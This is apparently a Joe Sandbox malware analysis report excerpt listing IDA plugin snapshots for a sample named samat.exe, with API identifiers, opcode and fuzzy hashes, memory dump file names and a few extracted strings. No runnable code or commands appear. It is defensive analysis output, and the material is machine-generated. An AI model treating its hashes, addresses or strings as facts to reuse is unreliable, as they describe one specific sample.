                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CopyLengthReferencemalloc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3624451276-0
                                                                                                                                                                                                                                                                                      • Opcode ID: eb9076c558b8a3fd92a970d114becebbb9b8943ef10aafd25703f05eb12ffbd7
                                                                                                                                                                                                                                                                                      • Instruction ID: 2e4fddf363a0ddfeb77b49734ca5c904d53f1017660ab2308d1d7f4a68ad20fa
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb9076c558b8a3fd92a970d114becebbb9b8943ef10aafd25703f05eb12ffbd7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C014036A09B4186EB449B99F59416D63A5FF89FC0F440034EB4E43B75DF3DE4618700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                                                      • Instruction ID: f60843e89d54832239beb224f4aa960a89cfab9a1133ce52a4245f55b401e2a9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C114F22B14B068AEB009B60EC453A973A8FB19758F440E36DA2D967A4DF78D1548351
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4569493021.00007FF8A88F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8A88F0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4569432920.00007FF8A88F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4569745344.00007FF8A8BA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4569745344.00007FF8A8BC6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4569745344.00007FF8A8BD5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4569745344.00007FF8A8BDF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4569745344.00007FF8A8C21000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4569745344.00007FF8A8CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4570500261.00007FF8A8DFF000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4570583253.00007FF8A8E16000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4570666618.00007FF8A8E19000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4570738167.00007FF8A8E1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4570812645.00007FF8A8E1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4570888014.00007FF8A8E1E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4570990292.00007FF8A8E42000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4571061708.00007FF8A8E43000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4571137788.00007FF8A8E44000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4571215845.00007FF8A8E46000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4571297941.00007FF8A8E4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4571422062.00007FF8A8E8F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4571496577.00007FF8A8EC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4571587745.00007FF8A8EEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4571654980.00007FF8A8EEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4571734205.00007FF8A8EEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4571805350.00007FF8A8EF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4571873329.00007FF8A8EF1000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4571944470.00007FF8A8EF3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572018227.00007FF8A8F02000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572018227.00007FF8A8F0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572018227.00007FF8A8F2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572228737.00007FF8A8F30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8a88f0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                      • Opcode ID: fe63b84064a5ce4d74b8ca480f490018c065660e782260b98ef3b250c9bc7566
                                                                                                                                                                                                                                                                                      • Instruction ID: db877f699217190f7e356f6f86d3108e54df6ad0c22b67b840bf8713f03e0b31
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe63b84064a5ce4d74b8ca480f490018c065660e782260b98ef3b250c9bc7566
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16114C26B15F019AEB00CF60E8542A833A4FB19798F440E31DA2D877A4DF78E559C354
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memset$Referencemalloc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3353409452-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bbf950d98bc3cd11b916acf723f5275b2f468ca755442ab4f61e8457fbf862c0
                                                                                                                                                                                                                                                                                      • Instruction ID: 806a6a6a74a9a75ce54b0b3713388b2cc54b8ff793076d80b2b0484899ae12a3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbf950d98bc3cd11b916acf723f5275b2f468ca755442ab4f61e8457fbf862c0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3012422A24B9592EB04CF6AE44002E7761FF88FC4B495039EB1D87729EF3DC462C784
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Referencemallocmemcpymemset
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1282408338-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 73095b53417423003ff8c3720ff8871ddab7b9a8b5b7f12efa74452b125d15c7
                                                                                                                                                                                                                                                                                      • Instruction ID: 2da0647b2014f483e3aa3ee3bba6ee18c721f5da84edc104adc6f9092ce4ab96
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73095b53417423003ff8c3720ff8871ddab7b9a8b5b7f12efa74452b125d15c7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59F04F22B19B8181EB449B5AB84002DA360EF88FD0F888134EF5D57B2ADF3CD4928700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeReferencemallocmemset
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 306314696-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8eaef662fe11b7ed3f416aa89d04ef063d77837210d100f2d8329317cefc0958
                                                                                                                                                                                                                                                                                      • Instruction ID: 8bb81e66ccd2adc724b5b952eb15fe60c8f1f35d3a69d5f929733f75a9c27939
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8eaef662fe11b7ed3f416aa89d04ef063d77837210d100f2d8329317cefc0958
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CF03722A08B9186E700DB5AB84005DB364EF88FD0F548434EB4D43B29DF3CD5928744
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DescriptorSecurityfree$InitializeLengthReferencemalloc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2992339461-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3885bea4552c8b6a4a56223f5b7daa316118e0659c06125b2451a4d2c74a1f0f
                                                                                                                                                                                                                                                                                      • Instruction ID: c83526621931a4706ef4dc8a0caf819e2672ab3355b982e36325f102934b9f01
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3885bea4552c8b6a4a56223f5b7daa316118e0659c06125b2451a4d2c74a1f0f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82F09A22B08B0692EB449B5AF94437D63A1AF48FC0F588034DF4E47B65DF7DE0958300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CopyLengthReferencemalloc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3624451276-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a89472044513ba651987c9a091f99ce9793c8cbcf630952da96ca9784dc25113
                                                                                                                                                                                                                                                                                      • Instruction ID: 645979a92b179b036157fb30829777a46502ba775a38f2b5282333dc8aed6f67
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a89472044513ba651987c9a091f99ce9793c8cbcf630952da96ca9784dc25113
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EF0FE26B19B8192DB548B9AB94412DA7A5FF48FC0F544034EB5E43B68DF3CD4958700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Value$DeleteFreeLocalState_Thread
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3706641815-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8a2e063ff86a224c7f4f91bb71c4a4de6d4722a2c61b2448b33797f2fe0f29d8
                                                                                                                                                                                                                                                                                      • Instruction ID: 553d96b8b328d11c5aa3316e3470e59fe59cac2faa1b5adf42c3b92a735ee12e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a2e063ff86a224c7f4f91bb71c4a4de6d4722a2c61b2448b33797f2fe0f29d8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50F0C975A08B06C2FB589BAAF85433D23B0AF89FD1F584035DA0E063F1DE3CA884C600
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: ?
                                                                                                                                                                                                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                                                      • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                                                                      • Instruction ID: 64fa262109a55f46b90cb0bb29926850b713b0a42e297736b0476290db06b84c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09419E56B2834142FB62A731DC13379E758EB80BA4F948236EE4D87AD9DFBCD0418B01
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D9046
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA948: HeapFree.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA95E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA948: GetLastError.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA968
                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7E12CCBA5), ref: 00007FF7E12D9064
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                      • API String ID: 3580290477-3004328233
                                                                                                                                                                                                                                                                                      • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                                                                      • Instruction ID: 5544536e54f649732cfc9ad443cc61b9a80f777ffa9e05f62b53230a93af300f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24419136B0861286EB15BF21D8422BCA398EB44794B95403BE94E43B85CFBDE4818322
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                                                      • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                                                      • Instruction ID: 333f0d91c31fc5cb4db87eeaddf17072881df474e74a63838ce10eea95677d45
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E41E533718A4181DB20AF25E8453AAA7A4FB88784FC44136EE4E87798DF7CD411C751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573993442.00007FF8B8261000.00000020.00000001.01000000.0000002F.sdmp, Offset: 00007FF8B8260000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573922181.00007FF8B8260000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574064690.00007FF8B8263000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574129290.00007FF8B8264000.00000004.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574205224.00007FF8B8265000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b8260000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wassert
                                                                                                                                                                                                                                                                                      • String ID: (idx>=1) && (idx<=10)$src/AESNI.c
                                                                                                                                                                                                                                                                                      • API String ID: 3234217646-2495715787
                                                                                                                                                                                                                                                                                      • Opcode ID: f34cea9cfd06ae8d0bacecc527501edc0e611be2f02bd286901079fb247b3b81
                                                                                                                                                                                                                                                                                      • Instruction ID: 4c190fc5127ea1e958298275a700927f5c35dd763f0942ebed017587e6db1121
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f34cea9cfd06ae8d0bacecc527501edc0e611be2f02bd286901079fb247b3b81
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A721567390D3C24BD7034F75949909C7FA0EB96B90F99C1AAC38483642EAAC98CBC711
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
